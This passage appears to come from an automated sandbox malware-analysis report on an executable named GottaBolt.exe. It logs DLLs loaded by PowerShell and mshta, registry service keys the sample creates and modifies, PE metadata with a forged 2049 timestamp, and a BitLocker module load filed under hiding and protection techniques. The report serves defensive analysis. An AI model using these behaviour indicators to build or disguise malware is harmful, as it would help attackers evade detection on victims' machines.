          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\GottaBolt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: GottaBolt.exeStatic PE information: certificate valid
          Source: GottaBolt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GottaBolt.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: GottaBolt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: GottaBolt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\user\Desktop\NEW-ExpX\orel2\AppMsipPack64-Twitter\AppMSIpack\obj\Release\GottaBolt.pdb source: GottaBolt.exe
          Source: GottaBolt.exeStatic PE information: 0x9557AA46 [Tue May 25 10:13:26 2049 UTC]
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCCC705 push ss; iretd 0_2_00007FFAACCCC73F
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCCB4A9 push ebx; ret 0_2_00007FFAACCCB4AA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFAACBAD2A5 pushad ; iretd 10_2_00007FFAACBAD2A6
          Source: C:\Users\user\Desktop\GottaBolt.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
